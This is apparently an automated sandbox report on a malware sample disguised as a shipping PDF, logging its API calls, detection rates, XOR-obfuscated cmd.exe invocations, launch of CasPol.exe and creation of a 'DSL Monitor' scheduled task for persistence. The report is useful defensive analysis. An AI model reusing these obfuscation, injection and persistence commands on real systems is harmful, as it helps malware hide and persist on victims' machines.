Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0328127B
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03281A72
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03289674
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280A5D
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280E5E
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03289A50
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280EAA
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032802AC
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032806B8
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032872B9
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032812B1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03285EB7
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280A8B
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280EE5
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032802E6
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032806E7
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03281AFE
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03281AD8
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280AD6
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0328192B
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280124
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0328093B
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03289D34
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280D08
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03281D09
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280506
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03281112
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0328996C
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0328117F
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280174
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03281975
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0328715C
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280D52
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280952
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032801A4
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032811BD
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280DBE
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032819B1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280D89
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0328099F
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032811ED
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032871EE
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032805EF
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032801E3
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032819F6
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032805C4
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032809DC
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03281020
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03290825
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0328083A
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280C3B
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03281833
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280005
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03281C18
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03293019
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03289C19
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280013
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0328186C
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0329246F
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280463
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0328087E
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03286C42
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280054
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03281C56
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03286C56
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032898BD
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280C80
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03287485
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280098
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032860F9
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03281CCC
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032898C0
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03280CC1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032808C4
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032804C5
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_032810DE
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 140_2_051504B0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 140_2_05150938

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_0329371A NtResumeThread,
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03290DE4 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Code function: 1_2_03292895 NtProtectVirtualMemory,

Source: Original Shipment_Document.PDF.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: edgegdi.dll

Source: Original Shipment_Document.PDF.exe

Static PE information: invalid certificate

Source: Original Shipment_Document.PDF.exe	Virustotal: Detection: 32%
Source: Original Shipment_Document.PDF.exe	ReversingLabs: Detection: 22%

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe

File read: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe

Jump to behavior

Source: Original Shipment_Document.PDF.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe "C:\Users\user\Desktop\Original Shipment_Document.PDF.exe"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03631637^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5C382120^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7F303920^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x78713865^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B6D7569^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307575^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x41616575^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09696575^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0975752C^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19697965^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x49796569^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307571^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216D75^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"
Source: C:\Windows\System32\Conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09703C6B^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B6C7578^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"
Source: C:\Windows\System32\Conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0363032C^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B2D2024^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x55183929^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x563A7D2C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09753C65^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216475^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09696575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15793C65^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216675^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09697965^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5079653D^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0D697C35^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x172B6478^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03630620^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4D1F3C29^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5C093A2C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x572D3037^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x11307537^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0C75752C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19686375^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09697569^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307575^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15307575^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x10307B37^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0A64721C^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03630720^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x583D132C^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x553C7D2C^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B6C7965^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09216475^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09696575^962155845"
Source: C:\Windows\System32\Conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x15733C65^962155845"
Source: C:\Windows\System32\Conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0975752C^962155845"
Source: C:\Windows\System32\Conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19697C2C^962155845"
Source: C:\Windows\System32\Conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x172B6678^962155845"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0A6B6F7F^962155845"
Source: C:\Windows\System32\Conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Users\user\Desktop\Original Shipment_Document.PDF.exe"
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.eXe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DSL Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp6DD1.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe 0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x721C070B^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7C156677^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x03631637^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x5C382120^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x7F303920^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x78713865^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x4B6D7569^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19307575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x41616575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x09696575^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x0975752C^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x19697965^962155845"
Source: C:\Users\user\Desktop\Original Shipment_Document.PDF.exe	Process created: C:\Windows\SysWOW64\cmd.eXe cmd.eXe /c SeT /a "0x49796569^962155845"
